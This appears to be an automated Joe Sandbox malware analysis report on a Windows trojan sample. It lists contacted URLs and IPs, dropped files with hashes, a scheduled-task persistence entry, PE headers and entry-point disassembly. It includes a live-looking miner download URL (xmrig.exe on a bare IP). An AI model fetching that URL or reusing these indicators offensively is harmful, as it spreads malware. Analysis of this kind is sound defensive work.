https://www.imarket-eg.com/designs/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpg | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/business-consulting/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/contact-us/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgets | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/search-user-optimization/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/feed/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/social-media/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYM | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ve | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=1637579583 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus. | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/about-imarket/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css? | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=1630326243 | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#ei | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-includes/wlwmanifest.xml | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/social-media-marketing/ | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-display | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com | 0% | Avira URL Cloud | safe | -
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_pa | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
imarket-eg.com | 160.153.50.70 | true | false | - | unknown
vxsljuxgekdpuv.307xvytdn0 | unknown | unknown | false | - | unknown
www.imarket-eg.com | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.imarket-eg.com/library.bin | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.imarket-eg.com/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.cs | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/a | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/videography/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.1 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontend | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/contact-us/# | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-json/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://vXsLjUXgEkdPUv.307xVYtdN0 | QHSgso4hXH.exe | false | Avira URL Cloud: safe | low
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.0 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/m | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://analytify.io/downloads/analytify-wordpress-plugin/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/l | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/s | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);s | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/d | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/i | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpg | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/comments/feed/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?v | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://connect.facebook.net/en_US/fbevents.js | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.js | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://twitter.com/imarketegypt | advapi32.dll.0.dr | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.png | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=1637579040 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://193.218.201.246/xmrig.exe | ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFg | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/google-ads/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/web-design/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/branding/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/web-design-2/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://193.218.201.246/xmrig.exe(KKl | ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=1630326243 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver= | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver= | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caro | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.mi | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.1 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpg | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.png | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://gmpg.org/xfn/11 | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.0 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.mi | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/elementor-524/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~ | QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://instagram.com/imarketegypt?utm_medium=copy_link | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpg | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/business-consulting/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpg | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=1637579040 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/designs/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/feed/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgets | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/ | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/contact-us/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/search-user-optimization/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/social-media/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYM | QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ve | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | advapi32.dll.0.dr | false | - | high
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=1637579583 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/about-imarket/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus. | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/social-media-marketing/ | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-includes/wlwmanifest.xml | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/xmlrpc.php?rsd | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css? | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#ei | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-display | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=1630326243 | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_pa | advapi32.dll.0.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
160.153.50.70 | imarket-eg.com | United States | - | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
                        IP
                        127.0.0.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 749056
Start date and time: 2022-11-18 07:51:36 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: QHSgso4hXH.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.evad.winEXE@21/3@2/2
EGA Information:
• Successful, ratio: 66.7%
HDC Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
• Execution Graph export aborted for target ngentask.exe, PID 3128 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:52:54 | Task Scheduler | Run new task: ngentask path: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 321
Entropy (8bit): 5.355221377978991
Encrypted: false
SSDEEP: 6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5: 03C5BA5FCE7124B503EA65EF522177C3
SHA1: F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256: 8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512: 151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 85096
Entropy (8bit): 6.068116381033184
Encrypted: false
SSDEEP: 1536:vJ7xS0hlY2s+zFVNzXmGU8fnqGHcZEVjgGI:vfAR+z7Nmf8fqlZoK
MD5: ED7F195F7121781CC3D380942765B57D
SHA1: AEE93C4D84C2035C2FB20E4550672203FD209C60
SHA-256: CA003ECD9A6CAAE17824816D1D869173510B2EB3C13F62E1A5615F1DA64F9676
SHA-512: 15CEC9427A9311539F352F3034293157FAA5EC6AD0C7B9777474359C6770C8DF1EEE689C3E1478698C90D58C296251759913DC255A2D7141B26A8B1BAFEFB4EA
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Metadefender, Detection: 0%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.Z..............0.................. ... ....@.. .......................`......wm....`.....................................O.... ..@...............h>...@......X................................................ ............... ..H............text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B........................H........x..........9...........X........................................0...........s&...}.....('.....(.....{....-.*.,#.{....((........r...p......(>.....*..{....()...-......{....(*....+U...P...%....o+......i.3=..........(,...,,..()...,...(-.......(......3..{........o/....o0...%.-....,..o............rA..p......(>.....*....(....$..1........f.c.........H.........6.{.....o1...*...0..C........j..()...,..(-......(..........r}..p......%...(>......{......o/...*..................0..
                        Process:C:\Users\user\Desktop\QHSgso4hXH.exe
                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7178), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):92160
                        Entropy (8bit):5.333658046180996
                        Encrypted:false
                        SSDEEP:1536:zrDVpcYyhR/mNhRPufA7E+k6CBbEXKv/tji21YFuGBXkNsMrFuGBXkNsM2KxPhXh:zrROHmNbPv7Ebtu2GFpBkNPrFpBkNP2c
                        MD5:D458D9192514B396EB8ED0354EBD93D0
                        SHA1:BE508F92631C8532D7FEF5BA14B49C1AC22E72FB
                        SHA-256:9062710822767EA3799FDD96221969724D9A27F45800F1E8598D27761E8F9631
                        SHA-512:D76221B3885C18C7B7858AB16684B77E9E65FD47FCDC2441632544B6E90C6AB77C649795AD2FC147A9FDA8AF8B186927908E8F5DE1E416083D6F1150C618EBD0
                        Malicious:false
                        Preview:<!doctype html>.<html lang="en">.<head>..<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1">..<link rel="profile" href="https://gmpg.org/xfn/11">..<title>Page not found &#8211; iMarket EG</title>.<meta name='robots' content='max-image-preview:large' />.<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />.<link rel="alternate" type="application/rss+xml" title="iMarket EG &raquo; Feed" href="https://www.imarket-eg.com/feed/" />.<link rel="alternate" type="application/rss+xml" title="iMarket EG &raquo; Comments Feed" href="https://www.imarket-eg.com/comments/feed/" />.<style type="text/css">.img.wp-smiley,.img.emoji {..display: inline !important;..border: none !important;..box-shadow: none !important;..height: 1em !important;..width: 1em !important;..margin: 0 0.07em !important;..vertical-align: -0.1em !important;..background: none !important;..padding: 0 !important;.}.</style>..<link rel='stylesheet' id='chaty-front-css-css' hr
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.848246051600344
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:QHSgso4hXH.exe
                        File size:1138176
                        MD5:2f8df206ba700503dbebf59e937af0ec
                        SHA1:7c36d57af94f2dd16a62c09356b4ef2c63e456fd
                        SHA256:6bb1564eca89071edd9c42b84481aed5f3f5aaccedb8f61d6fb892b7f08bdca7
                        SHA512:6fbb58b3e3046498c64ad659db07ecd28357c54d65d2f1cf00220ce1bbd4fa4693dbe2c0df607a801f5cf6757bd5327735448c3babecb997ec85e88049275a59
                        SSDEEP:24576:+JqzI2HEUvWMJsbHsoO0YTyllU3OWuA5aRn:+JrbG70Y4WFZ8Rn
                        TLSH:B435F16AF7C2513BE845F2780A5381B5B6B7E8509E202F637522EA1F2D72087DC5707E
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........."...q...q...q..lq...q..Yq...q..mq...q..Tq...q...q...q..hq...q..]q...q..Pq...q..Zq...qRich...q........................PE..L..
                        Icon Hash:6e61c9d46464f2d5
                        Entrypoint:0x40607a
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x637709BB [Fri Nov 18 04:27:39 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:15e5ac4e63af04f3034d99698484adf1
                        Instruction
                        call 00007FBDC0E6447Ah
                        jmp 00007FBDC0E60D1Eh
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        sub esp, 00000328h
                        mov dword ptr [004F3F00h], eax
                        mov dword ptr [004F3EFCh], ecx
                        mov dword ptr [004F3EF8h], edx
                        mov dword ptr [004F3EF4h], ebx
                        mov dword ptr [004F3EF0h], esi
                        mov dword ptr [004F3EECh], edi
                        mov word ptr [004F3F18h], ss
                        mov word ptr [004F3F0Ch], cs
                        mov word ptr [004F3EE8h], ds
                        mov word ptr [004F3EE4h], es
                        mov word ptr [004F3EE0h], fs
                        mov word ptr [004F3EDCh], gs
                        pushfd
                        pop dword ptr [004F3F10h]
                        mov eax, dword ptr [ebp+00h]
                        mov dword ptr [004F3F04h], eax
                        mov eax, dword ptr [ebp+04h]
                        mov dword ptr [004F3F08h], eax
                        lea eax, dword ptr [ebp+08h]
                        mov dword ptr [004F3F14h], eax
                        mov eax, dword ptr [ebp-00000320h]
                        mov dword ptr [004F3E50h], 00010001h
                        mov eax, dword ptr [004F3F08h]
                        mov dword ptr [004F3E04h], eax
                        mov dword ptr [004F3DF8h], C0000409h
                        mov dword ptr [004F3DFCh], 00000001h
                        mov eax, dword ptr [004F3284h]
                        mov dword ptr [ebp-00000328h], eax
                        mov eax, dword ptr [004F3288h]
                        mov dword ptr [ebp-00000324h], eax
                        call dword ptr [0000008Ch]
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [IMP] VS2008 SP1 build 30729
                        • [RES] VS2010 build 30319
                        • [LNK] VS2010 build 30319
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf1dc4 | 0x50 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf7000 | 0x23c70 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0xf0000 | 0x158 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0xee6b8 | 0xee800 | False | 0.8445238797169812 | data | 7.8950275690936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
